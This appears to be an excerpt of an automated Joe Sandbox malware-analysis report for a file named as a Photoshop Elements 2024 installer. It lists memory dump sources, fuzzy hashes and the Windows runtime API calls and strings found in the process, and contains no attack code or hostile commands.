                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ad781d382b06d5bd642c760e154b3e2ca856f1ade5eb03018fd8ba977d1fc97
                                                                                                        • Instruction ID: 4cc274c5b6cdcff37829e87243b2ecf078119fa72abcf8d23b5ee3ba312f4f82
                                                                                                        • Opcode Fuzzy Hash: 9ad781d382b06d5bd642c760e154b3e2ca856f1ade5eb03018fd8ba977d1fc97
                                                                                                        • Instruction Fuzzy Hash: 97E1D431B103099BCB14DFACD8855ADB7F9FF88310B64466EE416D7392DB31AA60CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 4283097504-0
                                                                                                        • Opcode ID: 7ccb27c23ab61150e73ebfeba367c833f6bb14e1c6604595e7947f68e6062802
                                                                                                        • Instruction ID: c3f71415d39b2d601f2ba1d287ff69cbb3380f15ceaab44e88364c43f14e71bf
                                                                                                        • Opcode Fuzzy Hash: 7ccb27c23ab61150e73ebfeba367c833f6bb14e1c6604595e7947f68e6062802
                                                                                                        • Instruction Fuzzy Hash: DFB106755007069BDB389B24CC92BF7BBA8FF8430CF24496DEA47C65C0EA75A985CB00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e375ca0c3b4e0941b3cca7a0535c6fd3058556be99fc056e22786e846ac5878b
                                                                                                        • Instruction ID: da723bc223a7ec61f308fc7502bad871d1cb759f285f7ed2ccb268e25d76b05c
                                                                                                        • Opcode Fuzzy Hash: e375ca0c3b4e0941b3cca7a0535c6fd3058556be99fc056e22786e846ac5878b
                                                                                                        • Instruction Fuzzy Hash: 4FB178706687C18FC724CF2AC4547AAB7F1AF9A305F88495DF096877A2D370EA94CB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 062f95ef3d6be7af719a305f6e869d0234b11a08ac86190175e103ddf8784d8e
                                                                                                        • Instruction ID: 0bf3c11b09f034178c6d1d789956c359c5176df5a5a733495df5a23797e946bc
                                                                                                        • Opcode Fuzzy Hash: 062f95ef3d6be7af719a305f6e869d0234b11a08ac86190175e103ddf8784d8e
                                                                                                        • Instruction Fuzzy Hash: B7613770600206A6FB38AA2848957FE7F95FF81744F54493EE442EB2F1D761ADC2CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b55b25fbc3e92e4a664993bf988204d177ae2af60c39f5ccc2161f85632ce6e1
                                                                                                        • Instruction ID: 4ceb05372d149021d4fa990d85c3a39436d9a531b82634712f26190af26d8e98
                                                                                                        • Opcode Fuzzy Hash: b55b25fbc3e92e4a664993bf988204d177ae2af60c39f5ccc2161f85632ce6e1
                                                                                                        • Instruction Fuzzy Hash: AC21B673F20539477B0CC47E8C562BDB6E1C68C501745823AE8A6EA2C1E968D917E2E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1d1449db83724d3f84224818299b67a54cf3491b95f59a1fdaa1ac990671d179
                                                                                                        • Instruction ID: 85a036fcc2baf4e53bc67ccfc603314c139583c60e7fb5e0bb18231d1ff1f30f
                                                                                                        • Opcode Fuzzy Hash: 1d1449db83724d3f84224818299b67a54cf3491b95f59a1fdaa1ac990671d179
                                                                                                        • Instruction Fuzzy Hash: B711A773F30C255B675C81698C172BA95D2EBD824034F533AD826E7284E994DE13D290
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a9486a10f2320eb17c7116f68f3242d37b708120a8754045264d9c4dfc597859
                                                                                                        • Instruction ID: 7a5f9e77906a8f8b47d077ec77111213c3bbb9e2ae44fb5cb5a4f58c327dda57
                                                                                                        • Opcode Fuzzy Hash: a9486a10f2320eb17c7116f68f3242d37b708120a8754045264d9c4dfc597859
                                                                                                        • Instruction Fuzzy Hash: 98F03972A14234EBDB26DB48D809AA977ECFB89B61F510496F602EB251D7B0DE40C7C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 66a400a8b6ea2c6bfbd79ebf6a89e9b60c091379e4a07e8bb0dc6292cd69e8da
                                                                                                        • Instruction ID: d6c54a76939a1002843fd7b5ac75387bca1f136938da4639b55edf60d6f03446
                                                                                                        • Opcode Fuzzy Hash: 66a400a8b6ea2c6bfbd79ebf6a89e9b60c091379e4a07e8bb0dc6292cd69e8da
                                                                                                        • Instruction Fuzzy Hash: FFE04672915238EBCB24DB88898898AB7ECFB88B10F1104A6B601D3100C2B0DE00C7D1
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0024144F
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00241471
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00241491
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00241610
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00241636
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00241658
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0024165D
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00241662
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002417AD
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002417B2
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002417B7
                                                                                                          • Part of subcall function 00521898: _free.LIBCMT ref: 005218AB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task$std::_$Lockit$Lockit::_Lockit::~_$Facet_Register_free
                                                                                                        • String ID: false$ostream$true
                                                                                                        • API String ID: 2654531044-2109533965
                                                                                                        • Opcode ID: 996adab75b2df4062b2633877532e12a4955515b9f9ab5098f95adaf00571027
                                                                                                        • Instruction ID: 5156388e49bac3d63d498528045aabcef30d81f193203674be8e625e63fb42d1
                                                                                                        • Opcode Fuzzy Hash: 996adab75b2df4062b2633877532e12a4955515b9f9ab5098f95adaf00571027
                                                                                                        • Instruction Fuzzy Hash: D8C12F709003468FDB24DFA4D845BAEBFB4FF45300F08852DE806AB782D772AA54CB91
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00540744
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA17
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA29
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA3B
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA4D
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA5F
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA71
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA83
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FA95
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FAA7
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FAB9
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FACB
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FADD
                                                                                                          • Part of subcall function 0053F9FA: _free.LIBCMT ref: 0053FAEF
                                                                                                        • _free.LIBCMT ref: 00540739
                                                                                                          • Part of subcall function 00535D79: RtlFreeHeap.NTDLL(00000000,00000000,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?), ref: 00535D8F
                                                                                                          • Part of subcall function 00535D79: GetLastError.KERNEL32(?,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?,?), ref: 00535DA1
                                                                                                        • _free.LIBCMT ref: 0054075B
                                                                                                        • _free.LIBCMT ref: 00540770
                                                                                                        • _free.LIBCMT ref: 0054077B
                                                                                                        • _free.LIBCMT ref: 0054079D
                                                                                                        • _free.LIBCMT ref: 005407B0
                                                                                                        • _free.LIBCMT ref: 005407BE
                                                                                                        • _free.LIBCMT ref: 005407C9
                                                                                                        • _free.LIBCMT ref: 00540801
                                                                                                        • _free.LIBCMT ref: 00540808
                                                                                                        • _free.LIBCMT ref: 00540825
                                                                                                        • _free.LIBCMT ref: 0054083D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID: DEj
                                                                                                        • API String ID: 161543041-2830880520
                                                                                                        • Opcode ID: 3a33992c46b44a25ee5cfb7e05defc1b8816d2000f8db6af632d321f4c0e2126
                                                                                                        • Instruction ID: 2370706f2af3ddb86e6b8188af0a67257329cc49cfac4ad5c7f7a42d68b96172
                                                                                                        • Opcode Fuzzy Hash: 3a33992c46b44a25ee5cfb7e05defc1b8816d2000f8db6af632d321f4c0e2126
                                                                                                        • Instruction Fuzzy Hash: 4C317236500A01AFDB216F38D849B967FE8FF80314F206829E145D7191DF70FD808B91
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000000,?,003ED171,00000000,00000000,00000001), ref: 003C691A
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 003C69C8
                                                                                                        • GetLastError.KERNEL32 ref: 003C69DF
                                                                                                        • GetLastError.KERNEL32 ref: 003C6A03
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                                        • String ID: Error allocating memory while converting UTF8 string to Native string$Failed to convert MultiByteToWideChar. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                        • API String ID: 203985260-475419079
                                                                                                        • Opcode ID: 766017a21c62cdda8776b17fe50fad7be1cc3c44677aa9703ca7ffc728662cdd
                                                                                                        • Instruction ID: 2d79143ca6130032964ba4c815d76b2d140e2d323f7afc3d90fe2c09d71b4988
                                                                                                        • Opcode Fuzzy Hash: 766017a21c62cdda8776b17fe50fad7be1cc3c44677aa9703ca7ffc728662cdd
                                                                                                        • Instruction Fuzzy Hash: BC4144367812147BDB20BB58EC47F6B7BA5EF82B10F05826DF909A72D0DA615C0587D1
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,002E8E75,002E8E77,00000000,00000000,9F8BC7FC,?,00000000,?,00512F20,0069EFB0,000000FE,?,002E8E75,?), ref: 00512409
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,002E8E75,?,00000000,00000000,?,00512F20,0069EFB0,000000FE,?,002E8E75), ref: 00512484
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0051248F
                                                                                                        • _com_issue_error.COMSUPP ref: 005124B8
                                                                                                        • _com_issue_error.COMSUPP ref: 005124C2
                                                                                                        • GetLastError.KERNEL32(80070057,9F8BC7FC,?,00000000,?,00512F20,0069EFB0,000000FE,?,002E8E75,?), ref: 005124C7
                                                                                                        • _com_issue_error.COMSUPP ref: 005124DA
                                                                                                        • GetLastError.KERNEL32(00000000,?,00512F20,0069EFB0,000000FE,?,002E8E75,?), ref: 005124F0
                                                                                                        • _com_issue_error.COMSUPP ref: 00512503
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1353541977-0
                                                                                                        • Opcode ID: d7adc7a95f065f9f67d816dd5d1ebbcca6ae7da89c481213aec569fc19bf9059
                                                                                                        • Instruction ID: 29193a8abf78c7d38573c5c7f574da420e92421eb09d7e2fd11639df08f69557
                                                                                                        • Opcode Fuzzy Hash: d7adc7a95f065f9f67d816dd5d1ebbcca6ae7da89c481213aec569fc19bf9059
                                                                                                        • Instruction Fuzzy Hash: 69412671A002069BEB109F68DC89BEEBFA8FF45710F104629F819E7280D7759990CBA4
                                                                                                        APIs
                                                                                                        • RtlDecodePointer.NTDLL(?), ref: 00539E76
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-1781906193
                                                                                                        • Opcode ID: 90603ed499c283f0d0d22574f292f6989698d29663b464f7bf2fd1d6b827bd31
                                                                                                        • Instruction ID: a169c67fa5e1ead52a361d8e1ae2905185984d54d613a8f61d4f353c45095fe8
                                                                                                        • Opcode Fuzzy Hash: 90603ed499c283f0d0d22574f292f6989698d29663b464f7bf2fd1d6b827bd31
